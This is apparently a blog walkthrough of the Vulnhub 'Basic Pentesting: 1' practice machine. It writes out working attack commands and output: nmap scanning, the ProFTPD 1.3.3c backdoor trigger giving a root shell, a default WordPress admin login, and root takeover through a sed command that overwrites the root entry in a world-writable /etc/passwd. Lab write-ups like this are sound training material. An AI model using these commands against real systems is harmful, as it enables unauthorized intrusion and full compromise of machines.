CTF Walkthrough - Basic Pentesting: 1
According to the Vulnhub description, this machine is intended to newcomers. It has different ways to get to the goal (rooting the machine). The machine is pretty realistic (I have found similar scenarios on real life pentestings), which makes it… Well, not amusing. But still, it’s nice for beginners to practice!
Identification and Enumeration
The first thing to do is identify the target IP. Luckily it answers to
requests, so a simple
fping will make it:
root@kali:~# fping -aqg 192.168.10.0/24 [...] 192.168.10.195
After some seconds,
fping spits a handful of IPs. The only unknown address in
that list is
192.168.10.195, which should be my new guest, and my target IP.
Then, as always,
nmap is used to get all of the information about the
services running in the machine.
nmap -sT -p- -A -vvv -oA nmap 192.168.10.195 [...] PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ProFTPD 1.3.3c 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
The first thing to notice is that ProFTPD 1.3.3c is a backdoored version
searchsploit). The package distribution was compromised by an
attacker, distributing a compromised version of the software. Not cool! The
full compromise report can be found
Luckily for us, we don’t need to defend the machine, but attack it. Of course, this backdoor is completely documented, and we can make use of it. The manual PoC is really simple (the full information may be found here), so let’s try it:
root@kali:~# nc 192.168.10.195 21 220 ProFTPD 1.3.3c Server (vtcsec) [192.168.10.195] HELP ACIDBITCHEZ id; uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
That was fast, root in a few minutes. But this machine isn’t over!
Of course, we can also make use of this backdoor using Metasploit, which take
us the need for searching the manual PoC. Given my environment, the default
Metasploit payload for this case (
cmd/unix/reverse on port 4444) works for
me, so this is also a super easy job:
FTP successfully completed!
Now this is where this machine starts to get interesting.
nmap detects an
Apache on port 80, let’s see:
Well, not too impressive. Maybe there’s something else on the web server…
root@kali:~# dirb 'http://192.168.10.195' ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Apr 8 22:38:47 2018 URL_BASE: http://192.168.10.195/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.10.195/ ---- + http://192.168.10.195/index.html (CODE:200|SIZE:177) ==> DIRECTORY: http://192.168.10.195/secret/ [...]
secret directory, that’s better. This path contains a Wordpress blog, with
the default “Hello world!” post. Maybe the administration login panel is found
on the default location,
It is! However, something important happened. The URL is not an IP anymore, the
browser followed a redirection to
http://vtsec/secret/wp-login. In my
network, I don’t need to make further adjustments, as my DNS/DHCP server
handles the situation correctly, and resolves the hostname of the VM to the
actual IP. When this isn’t the case, a new entry in
/etc/hosts should be
added, so the web application works correctly.
Of course, the first thing to try here is the classical h4x0r technique: login
admin:admin. And it works!
Now, as the
admin username has actual administration privileges, the easiest
thing to do is using a Metasploit module to make use of this permissions and
get code execution on the server:
We have a shell with limited permissions (user
www-data), so we need to find
a way to escalate privileges in the machine. First of all, let’s retrieve
/etc/passwd, just in case:
www-data@vtcsec:$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash [... system users ...] marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash [... more system users ...]
There is a single non-system user (besides of
marlinspike. I’ll make
note of it, just in case.
Something else should be noted here. These are the permissions of the file
www-data@vtcsec:$ ls -lah /etc/passwd -rw-rw-rw- 1 root root 2.4K Nov 16 13:02 /etc/passwd
The file is world-writable! Usually, UNIX systems divide the user login information in two files:
/etc/passwd: Stores username, encrypted/hashed password, user and group ID, comment, home directory, and command interpreter. If password is
x, then the hashed password is stored in
/etc/shadow. World-readable, but not usually world-writable (permissions
root). More info:
man 5 passwd.
/etc/shadow: Used to store password information. Stores username, encrypted/hashed password, and other account validity stuff (password age, last change date, account expiration date…). Only readable by root (permissions
root). More info:
man 5 shadow.
So, if we can write on
/etc/passwd, it means we can set the password for any
user, even if it has been previously set on
/etc/shadow. Even the root user!
First of all, we need to generate a password hash (using a salt):
root@kali:~# mkpasswd -5 delicious oatmeals $1$oatmeals$zt2BfPPpVxqgikzNDxQRb1
Then, we change the
root entry, so the
x in the password field is replaced
by our delicious hashed password:
www-data@vtcsec:$ cat /etc/passwd | sed 's/root:x/root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1/' > /etc/passwd www-data@vtcsec:$ cat /etc/passwd root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1:0:0:root:/root:/bin/bash [... more users ...]
We got root!
There is one more service running in the machine: SSH. However, the installed version does not appear vulnerable
We made note of an existing user, though. And password login is enabled, there is no need of finding a private key. What if…
Privilege escalation process would be exactly the same, as the user
marlinspike can also write on
As its name establishes, this is a basic boot2root machine intended for beginner practice. It shows different ways to get into a vulnerable machine, which may be useful for your day-to-day pentesting operation. For more advanced pentesters, this is not the funniest machine to pwn.
All done here, have a nice day!